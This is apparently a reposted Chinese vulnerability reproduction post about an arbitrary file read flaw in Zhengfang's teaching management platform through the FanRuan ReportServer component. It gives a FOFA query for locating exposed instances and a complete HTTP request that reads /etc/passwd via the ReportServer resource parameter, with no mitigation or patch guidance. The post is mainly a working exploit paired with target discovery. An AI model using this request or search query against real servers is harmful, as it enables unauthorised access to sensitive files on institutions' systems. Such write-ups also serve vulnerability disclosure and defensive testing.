漏洞描述
正方软件股份有限公司教学管理信息服务平台使用帆软报表组件ReportServer存在任意文件读取漏洞,攻击者可通过该漏洞获取服务器上敏感文件内容。
资产测绘
FOFA:body="正方软件股份有限公司" && title="教学管理信息服务平台"
漏洞复现
GET /WebReport/ReportServer?op=resource&resource=/etc/passwd&i18n=true HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Content-Length: 0
原文始发于微信公众号(漏洞文库):【漏洞复现】正方教学管理信息服务平台ReportServer存在任意文件读取漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论